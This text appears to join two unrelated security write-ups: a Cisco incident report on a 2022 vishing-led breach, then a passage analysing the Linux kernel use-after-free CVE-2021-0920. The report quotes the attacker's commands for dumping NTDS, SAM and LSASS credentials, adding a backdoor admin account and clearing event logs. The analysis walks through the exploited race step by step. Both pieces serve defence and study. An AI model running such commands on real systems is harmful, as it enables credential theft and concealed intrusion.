Adding clarifying details on activity involving active directory.
Aug. 10th 2022
Update made to the Cisco Response and Recommendations section related to MFA.
Β Executive summary
On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.Β
During the investigation, it was determined that a Cisco employeeβs credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victimβs browser were being synchronized.Β
The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.Β
CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.Β
After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.Β
The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.Β
We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.Β
For further information see the Cisco Response page here.
Initial vector
Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employeeβs personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the userβs credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the targetβs mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers β who spoke in English with various international accents and dialects β purported to be associated with support organizations trusted by the user.Β Β
Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.Β
Post-compromise TTPs
Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.Β
Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.Β
After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.Β Β
After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using βntdsutil.exeβ consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q qΒ
They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.
After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.Β
Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called βzβ on the system using the built-in Windows βnet.exeβ commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the βzβ account by this actor in previous engagements prior to the Russian invasion of Ukraine.Β
C:\Windows\system32\net user z Lh199211* /addΒ
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.Β Β
reg save hklm\system systemΒ
reg save hklm\sam samΒ
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.Β
tasklist | findstr lsassΒ
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the βwevtutil.exeβ utility to identify and clear event logs generated on the system.Β
wevtutil.exe elΒ
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker removing the previously created local administrator account.Β Β
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.Β
netsh advfirewall firewall set rule group=remote desktop new enable=Yes
We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.Β
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:Β Β
This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.Β Β
Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employeeβs account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.Β Β
In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.Β
After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.
Backdoor analysis
The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a βDELETE_SELFβ command that removes the backdoor from the system completely. Another, more interesting, command, βWIPEβ, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.Β
Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:Β
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:Β
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.Β Β
The aforementioned HTTP requests are sent using the following user-agent string:Β
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called βbdata.iniβ in the malwareβs current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:Β Β
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.Β Β
Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.Β
Attack attribution
Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.Β
UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as βdouble extortion,β in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operatingΒ a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.Β
Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.Β
While we did not observe ransomware deployment in this attack, the TTPs used were consistent with βpre-ransomware activity,β activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.Β
Cisco response and recommendations
Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attackerβs progression. We created two ClamAV signatures, which are listed below.Β Β
Win.Exploit.Kolobko-9950675-0Β Β
Win.Backdoor.Kolobko-9950676-0Β
Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.Β
Given the actorβs demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.Β
For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access.
Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices matchΒ the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.Β
Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.Β Β
Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.Β Β
In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organizationβs ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organizationβs ability to effectively recover following an attack.Β
Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.Β Β
Mitre ATT&CK mapping
All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred.Β
Guest Post by Xingyu Jin, Android Security Research
This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.
Overview of in-the-wild CVE-2021-0920 exploits
A surveillance vendor named WintegoΒ has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021. Β Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.
Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performedΒ the full deep-dive analysis of the exploit.
This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patchΒ the issue until it was re-reported in 2021.
Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buffΒ object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root.Β Other Android devicesΒ were also vulnerable, but we did not find any exploit samples against them.
Text extracted from captured samples dubbed the vulnerability βquantum Linux kernel garbage collectionβ, which appears to be a fitting title for this blogpost.
Introduction
CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTSΒ is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buffΒ object. In the following sections, weβll explain the SCM_RIGHTSΒ garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.
What is SCM_RIGHTS?
Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTSΒ will add a reference to the underlying fileΒ struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the βqueuedβ state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this βqueuedβ state, this LWN articleΒ does a great job explaining SCM_RIGHTSΒ reference counting, and it's recommended reading before continuing on with this blogpost.
Sending
As stated previously, a unix domain socket uses the syscall sendmsgΒ to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, weβll start from the senderβs point of view. We start with the kernelΒ function unix_stream_sendmsg, which implements the sendmsgΒ syscall. To implement the SCM_RIGHTSΒ functionality, the kernel uses the structure scm_fp_listΒ for managing all the transmitted fileΒ structures. scm_fp_listΒ stores the list of fileΒ pointers to be passed.
structΒ scm_fp_list {
Β Β Β Β shortΒ Β Β Β Β Β Β Β Β Β count;
Β Β Β Β shortΒ Β Β Β Β Β Β Β Β Β max;
Β Β Β Β structΒ user_struct Β Β Β *user;
Β Β Β Β structΒ file Β Β Β Β Β Β *fp[SCM_MAX_FD];
};
unix_stream_sendmsgΒ invokes scm_sendΒ (af_unix.c#L1886) to initialize the scm_fp_listΒ structure, linked by theΒ scm_cookieΒ structure on the stack.
To be more specific, scm_sendΒ β __scm_sendΒ β scm_fp_copyΒ (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fpΒ which can contain SCM_MAX_FDΒ file structures.
Since the Linux kernel uses the sk_buffΒ (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skbΒ function to link the scm_cookie->fpΒ to a corresponding skbΒ object. This occurs in unix_attach_fdsΒ (scm.c#L103):
β¦
/*
Β * Need to duplicate file references for the sake of garbage
Β * collection. Β Otherwise a socket in the fps might become a
Β * candidate for GC while the skb is not yet queued.
Β */
UNIXCB(skb).fp =Β scm_fp_dup(scm->fp);
ifΒ (!UNIXCB(skb).fp)
Β Β Β Β returnΒ -ENOMEM;
β¦
The scm_fp_dupΒ call in unix_attach_fdsΒ increases the reference count of the file descriptor thatβs being passed so the file is still valid even after the sender closes the transmitted file descriptor later:
Letβs examine a concrete example. Assume we have sockets AΒ and B. The AΒ attempts to pass itself to B. After the SCM_RIGHTSΒ datagram is sent, the newly allocated skbΒ from the sender will be appended to the Bβs sk_receive_queueΒ which stores received datagrams:
sk_buffΒ carries scm_fp_listΒ structure
The reference count of AΒ is incremented to 2 and the reference count of BΒ is still 1.
Receiving
Now, letβs take a look at the receiver side unix_stream_read_genericΒ (we will not discuss the MSG_PEEKΒ flag yet, and focus on the normal routine). First of all, the kernel grabs the current skbΒ from sk_receive_queueΒ using skb_peek. Secondly, since scm_fp_listΒ is attached to the skb, the kernel will call unix_detach_fdsΒ (link) to parse the transmitted file structures from skbΒ and clear the skbΒ from sk_receive_queue:
/* Mark read part of skb as used */
ifΒ (!(flags &Β MSG_PEEK))Β {
Β Β Β Β UNIXCB(skb).consumed +=Β chunk;
Β Β Β Β sk_peek_offset_bwd(sk,Β chunk);
Β Β Β Β ifΒ (UNIXCB(skb).fp)
Β Β Β Β Β Β Β Β unix_detach_fds(&scm,Β skb);
Β Β Β Β ifΒ (unix_skb_len(skb))
Β Β Β Β Β Β Β Β break;
Β Β Β Β skb_unlink(skb,Β &sk->sk_receive_queue);
Β Β Β Β consume_skb(skb);
Β Β Β Β ifΒ (scm.fp)
Β Β Β Β Β Β Β Β break;
The function scm_detach_fdsΒ iterates over the list of passed file descriptors (scm->fp)Β and installs the new file descriptors accordingly for the receiver:
Β * All of the files that fit in the message have had their
Β * usage counts incremented, so we just free the list.
Β */
__scm_destroy(scm);
Once the file descriptors have been installed, __scm_destroyΒ (link) cleans up the allocated scm->fpΒ and decrements the file reference count for every transmitted file structure:
As mentioned above, when a file descriptor is passed using SCM_RIGHTS,Β its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the βmiddleβ of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.
Letβs consider the following scenario:
The process creates sockets AΒ and B.
AΒ sends socket A to socket B.
BΒ sends socket BΒ to socket A.
Close A.
Close B.
Scenario for reference count cycle
Both sockets are closed prior to accepting the passed file descriptors.The reference counts of AΒ and BΒ are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflightΒ count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflightΒ count will also be incremented.
When a file descriptor is sent by SCM_RIGHTSΒ datagram,Β the Linux kernel puts its unix_sockΒ into a global list gc_inflight_list. The kernelΒ increments unix_tot_inflightΒ which counts the total number of inflight sockets. Then, the kernel increments u->inflightΒ which tracks the inflight count for each individual file descriptor in the unix_inflightΒ function (scm.c#L45) invoked from unix_attach_fds:
Thus, here is what the sk_buffΒ looks like when transferring a file descriptor within sockets AΒ and B:
The inflight count of AΒ is incremented
When the socket file descriptor is received from the other side, the unix_sock.inflightΒ count will be decremented.
Letβs revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle:Β
Breakable cycle before close AΒ and B
After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:
Unbreakable cycle after close AΒ and B
Now, letβs check another example. Assume we have sockets A, BΒ and πΌ:
AΒ sends socket AΒ to socket B.
BΒ sends socket BΒ to socket A.
BΒ sends socket BΒ to socket πΌ.
πΌΒ sends socket πΌΒ to socket B.
Close A.
Close B.
Breakable cycle for A, BΒ andΒ πΌ
The cycle is breakable, because we can get newly installed file descriptor BβΒ from the socket file descriptor πΌΒ and newly installed file descriptor A'Β from Bβ.
Garbage Collection
A high level view of garbage collection is available from lwn.net:
"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.
At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."
To be more specific, the SCM_RIGHTSΒ garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:
Add any unix_sockΒ objects whose reference count equals its inflight count to the gc_candidatesΒ list.
Determine if the socket is referenced by any sockets outside of the gc_candidatesΒ list. If it is then it is reachable, remove it and any sockets it references from the gc_candidatesΒ list. Repeat until no more reachable sockets are found.
After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidatesΒ list are left.
Letβs take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sockΒ objects whose reference counts equals their inflight count and puts them into the gc_candidatesΒ listΒ (garbage.c#L242):
Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidatesΒ list. To do this, the kernel invokes scan_childrenΒ (garbage.c#138) along with the function pointer dec_inflightΒ to iterate through each candidateβs sk->receive_queue.Β It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):
/* Now remove all internal in-flight reference to children of
After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidatesΒ list and therefore is reachable. These candidates should not be included in the gc_candidatesΒ list so the related inflight counts need to be restored.
To do this, the kernel will put the candidate to not_cycle_listΒ instead and iterates through its receiver queue of each transmitted file in the gc_candidatesΒ listΒ (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:
/* Restore the references for children of all candidates,
Β * which have remaining references. Β Do this recursively, so
Β * only those remain, which form cyclic references.
Β *
Β * Use a "cursor" link, to make the list traversal safe, even
Β * though elements might be moved about.
Β */
list_add(&cursor,Β &gc_candidates);
whileΒ (cursor.nextΒ !=Β &gc_candidates)Β {
Β Β Β Β u =Β list_entry(cursor.next,Β structΒ unix_sock,Β link);
Β Β Β Β /* Move cursor to after the current position. */
Now gc_candidatesΒ contains only βgarbageβ. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_listΒ back to gc_inflight_listΒ and invokes __skb_queue_purgeΒ for cleaning up garbageΒ (garbage.c#L306).
/* Now gc_candidates contains only garbage. Β Restore original
Β * inflight counters for these as well, and remove the skbuffs
There are two ways to trigger the garbage collection process:
wait_for_unix_gcΒ is invoked at the beginning of the sendmsgΒ function if there are more than 16,000 inflight sockets
When a socket fileΒ is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.
Note that unix_gcΒ is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gcΒ invocation.
Now, letβs check this example (a breakable cycle) with a pair of sockets f00Β and f01,Β and a single socket πΌ:
Socket fβ―00Β sends socket fβ―00Β to socket fβ―01.
Socket fβ―01Β sends socket fβ―01Β to socket πΌ.
Close fβ―00.
Close fβ―01.
Before starting the garbage collection process, the status of socket file descriptors are:
fβ―00: ref = 1, inflight = 1
fβ―01: ref = 1, inflight = 1
πΌ: ref = 1, inflight = 0
Breakable cycle by f 00, f 01Β and πΌ
During the garbage collection process, f 00Β and f 01Β are considered garbage candidates. The inflight count of f 00Β is dropped to zero, but the count of f 01Β is still 1 because πΌΒ is not a candidate. Thus, the kernel will restore the inflight count from f 01βsΒ receive queue. As a result, f 00Β and f 01Β are not treated as garbage anymore.
CVE-2021-0920 Root Cause Analysis
WhenΒ a user receives SCM_RIGHTSΒ message from recvmsgΒ without the MSG_PEEKΒ flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEKΒ flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.
recvmsg without MSG_PEEK flag
The kernel functionΒ unix_stream_read_genericΒ (af_unix.c#L2290) parses the SCM_RIGHTSΒ message and manages the file inflight count when the MSG_PEEKΒ flag is NOTΒ set. Then, the function unix_stream_read_genericΒ calls unix_detach_fdsΒ to decrement the inflight count. Then, unix_detach_fdsΒ clears the list of passed file descriptors (scm_fp_list) from the skb:
Later skb_unlinkΒ and consume_skbΒ are invoked from unix_stream_read_genericΒ (af_unix.c#2451)Β to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructorΒ (code) which redirects to unix_destruct_scm:
Β Β Β Β /* So fscking what? fput() had been SMP-safe since the last Summer */
Β Β Β Β scm_destroy(&scm);
Β Β Β Β sock_wfree(skb);
}
In fact, the unix_detach_fdsΒ will not be invoked again here from unix_destruct_scmΒ because UNIXCB(skb).fpΒ is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i]))Β from scm_detach_fdsΒ is invoked for installing a new file descriptor.
recvmsg with MSG_PEEK flag
The recvmsgΒ process is different if the MSG_PEEKΒ flag is set. The MSG_PEEKΒ flag is used during receive to βpeekβ at the message, but the data is treated as unread. unix_stream_read_genericΒ will invoke scm_fp_dupΒ instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):
/* It is questionable, see note in unix_dgram_recvmsg.
Β */
ifΒ (UNIXCB(skb).fp)
Β Β Β Β scm.fp =Β scm_fp_dup(UNIXCB(skb).fp);
sk_peek_offset_fwd(sk,Β chunk);
ifΒ (UNIXCB(skb).fp)
Β Β Β Β break;
Because the data should be treated as unread, the skbΒ is not unlinked and consumed when the MSG_PEEKΒ flag is set. However, the receiver will still get a new file descriptor for the inflight socket.
recvmsg Examples
Letβs see a concrete example. Assume there are the following socket pairs:
f 00, f 01
f 10, f 11
Now, the program does the following operations:
f 00Β β [f 00] β f 01 (means f 00Β sends [f 00] to f 01)
f 10Β β [f 00] β f 11
Close(f 00)
Breakable cycle by f 00, f 01, f 10Β andΒ f 11
Here is the status:
inflight(f 00) = 2, ref(f 00) = 2
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
If the garbage collection process happens now, before any recvmsgΒ calls, the kernel will choose f 00Β as the garbage candidate. However, f 00Β will not have the inflight count altered and the kernel will not purge any garbage.
If f 01Β then calls recvmsgΒ withΒ MSG_PEEKΒ flag, the receive queue doesnβt change and the inflight counts are not decremented. f 01Β gets a new file descriptor f 00'Β which increments the reference count on f 00:
MSG_PEEKΒ increment the reference count of f 00Β while the receive queue is not cleared
Status:
inflight(f 00) = 2, ref(f 00) = 3
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
Then, f 01Β calls recvmsgΒ withoutΒ MSG_PEEKΒ flag, f 01βs receive queue is removed. f 01Β also fetches a new file descriptor f 00'':
The receive queue of f 01Β is cleared and f 01''Β is obtained from f 01
Status:
inflight(f 00) = 1, ref(f 00) = 3
inflight(f 01) = 0, ref(f 01) = 1
inflight(f 10) = 0, ref(f 10) = 1
inflight(f 11) = 0, ref(f 11) = 1
UAF Scenario
From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEKΒ is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEKΒ receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skbΒ object.
Letβs see how the captured 0-dayΒ sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket πΌ:
f 00, f 01
f 10, f 11
f 20, f 21
f 30, f 31
sockΒ πΌΒ (actually there might be even thousands of πΌΒ for protracting the garbage collection process in order to evade a BUG_ONΒ check which will be introduced later).
Now, the program does the below operations:
Close the following file descriptors prior to any recvmsgΒ calls:
Close(f 00)
Close(f 01)
Close(f 11)
Close(f 10)
Close(f 30)
Close(f 31)
Close(πΌ)
Here is the status:
inflight(f 00) = NΒ + 1, ref(f 00) = N + 1
inflight(f 01) = 2, ref(f 01) = 2
inflight(f 10) = 3, ref(f 10) = 3
inflight(f 11) = 1, ref(f 11) = 1
inflight(f 20) = 0, ref(f 20) = 1
inflight(f 21) = 0, ref(f 21) = 1
inflight(f 31) = 1, ref(f 31) = 1
inflight(πΌ) = 1, ref(πΌ) = 1
If the garbage collection process happens now, the kernel will do the following scrutiny:
List f 00, f 01, f 10, Β f 11, f 31, πΌΒ as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
Since f 21Β is not considered a candidate, f 11βs inflight count is still above zero.
Recursively restore the inflight count.
Nothing is considered garbage.
A potential skb UAF by race condition can be triggered by:
Call recvmsgΒ with MSG_PEEKΒ flag from f 21Β to get f 11β.
Call recvmsgΒ with MSG_PEEKΒ flag from f 11Β to get f 10β.
Concurrently do the following operations:
Call recvmsgΒ without MSG_PEEKΒ flag from f 11Β to get f 10ββ.
Call recvmsgΒ with MSG_PEEKΒ flag from f 10β
How is it possible? Letβs see a case where the race condition is not hit so there is no UAF:
Thread 0
Thread 1
Thread 2
Call unix_gc
Stage0: List f 00, f 01, f 10, Β f 11, f 31, πΌΒ as garbage candidates.
Call recvmsgΒ with MSG_PEEKΒ flag from f 21Β to get f 11β
Stage0: decrease inflight count from the child of every garbage candidates
Status after stage 0:
inflight(f 00) = 0
inflight(f 01) = 0
inflight(f 10) = 0
inflight(f 11) = 1
inflight(f 31) = 0
inflight(πΌ) = 0
Stage1: Start restoring inflight count.
Call recvmsgΒ with MSG_PEEKΒ flag from f 11Β to get f 10β
Call recvmsgΒ without MSG_PEEKΒ flag from fβ―11Β to get fβ―10ββ
unix_detach_fds: UNIXCB(skb).fp = NULL
Blocked by spin_lock(&unix_gc_lock)
Stage1: scan_inflightΒ cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.
Stage2: f 00, f 01, f 10, f 31, πΌΒ are garbage.
Stage2: start purging garbage.
